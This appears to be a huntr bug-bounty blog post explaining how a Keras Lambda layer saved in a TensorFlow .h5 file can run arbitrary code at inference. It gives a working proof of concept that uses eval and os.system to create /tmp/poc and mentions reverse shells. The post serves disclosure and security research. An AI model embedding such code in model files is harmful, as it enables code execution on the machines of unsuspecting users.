huntr
+00:00 GMT
Hacking Resource
March 31, 2025

Exposing Keras Lambda Exploits in TensorFlow Models

Exposing Keras Lambda Exploits in TensorFlow Models
# AI Model File Formats
# Model File Vulnerability
# Model Format Vulnerability
# Python
# TensorFlow
# Keras Lamda Layers

Unveiling how Keras Lambda layers in TensorFlow models can be exploited to execute arbitrary code.

Ethan Silvas
Ethan Silvas
Exposing Keras Lambda Exploits in TensorFlow Models

In this blog, we’re breaking down one of our example Model File Vulnerabilities (MFVs) to help you understand how a trusted tool like TensorFlow—with its Keras Lambda layers—can be exploited. This example is a perfect starting point if you're looking to find and report your own MFVs.


The Vulnerability Explained

TensorFlow allows you to save neural network models with Keras Lambda layers, which enable custom logic via Python code. While these layers add flexibility to your model, they also let you embed any Python code. That means a malicious actor can hide dangerous payloads in what looks like a normal model file. When the model is used for inference, the hidden code is executed immediately on the victim’s machine.


The Technical Breakdown

How It Works

When you save a TensorFlow model that uses a Keras Lambda layer, the code within that layer is serialized into an HDF5 file (commonly with a .h5 extension). During inference, when the model is loaded and executed, this code runs—often without any obvious sign of trouble. An attacker can leverage this behavior to embed arbitrary OS commands that execute as soon as the model is run.


The Proof-of-Concept (PoC)

Our PoC demonstrates how this vulnerability can be exploited. In this example, a malicious Lambda layer is used to execute a system command that creates a file (/tmp/poc) when the model is loaded and inference is performed.


Step 1: Crafting the Malicious Model


from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Lambda
import tensorflow as tf

# Create a model with a Lambda layer that executes malicious code.
model = Sequential([
Lambda(lambda x: eval("__import__('os').system('touch /tmp/poc')" or x)),
])

# Save the model to an HDF5 file.
model.save("lambda_model.h5")

In this snippet, the Lambda layer is defined with a function that uses eval to execute a system call. When the model is saved, the malicious code is embedded within the .h5 file.


Step 2: Triggering the Payload


from tensorflow.keras.models import load_model

# Load the malicious model.
model = load_model("lambda_model.h5")

# Perform inference to trigger the payload.
input_data = tf.constant([[1.0]])
output = model(input_data)

When the model is loaded and inference is run, the malicious code in the Lambda layer executes automatically—creating /tmp/poc on the victim’s machine. In a real-world scenario, an attacker could replace this benign command with something far more damaging, such as launching a reverse shell or modifying system files.


Why This Matters

For bug bounty hunters, this isn’t just an academic example—it's a prime opportunity to cash in on the vulnerabilities lurking in AI/ML tools. Here’s why:

  1. A Launchpad for Discovery: Use this PoC as a springboard. Dig into other model formats and custom layers; you’re bound to uncover similar, exploitable flaws.
  2. Lucrative Bounties: With huntr offering up to $3,000 per validated MFV, each discovery not only boosts your reputation but also adds to your earnings.


Conclusion

The Keras Lambda layer vulnerability demonstrates that AI/ML models are more than just data—they can serve as conduits for executing arbitrary code. By understanding how this exploit works, you can better scout for similar vulnerabilities and help secure the ecosystem while earning rewards.

If you’ve discovered a new way to exploit model files or have a fresh twist on this vulnerability, submit your proof-of-concept and detailed report. Happy hunting!

Like
Comments (0)
Popular
avatar

Dive in

Related

Blog
Spotlight on hainguyen0207: Tackling AI/ML Exploits in LOLLMS Through Huntr
By Madi Vorbrich • Oct 17th, 2024 • Views 45
8:06
video
Between Two Vulns: Secrets in Triton's Inference Server and MLFlow
By madivo Vorbrich • Apr 11th, 2024 • Views 41
13:18
video
Between Two Vulns: Breaking Down March's Critical LLM Exploits
By madivo Vorbrich • Apr 11th, 2024 • Views 30
8:35
video
Between Two Vulns: LFI in lollms Exposed and More!
By madivo Vorbrich • Jul 24th, 2024 • Views 75
Blog
Spotlight on hainguyen0207: Tackling AI/ML Exploits in LOLLMS Through Huntr
By Madi Vorbrich • Oct 17th, 2024 • Views 45
13:18
video
Between Two Vulns: Breaking Down March's Critical LLM Exploits
By madivo Vorbrich • Apr 11th, 2024 • Views 30
8:35
video
Between Two Vulns: LFI in lollms Exposed and More!
By madivo Vorbrich • Jul 24th, 2024 • Views 75
8:06
video
Between Two Vulns: Secrets in Triton's Inference Server and MLFlow
By madivo Vorbrich • Apr 11th, 2024 • Views 41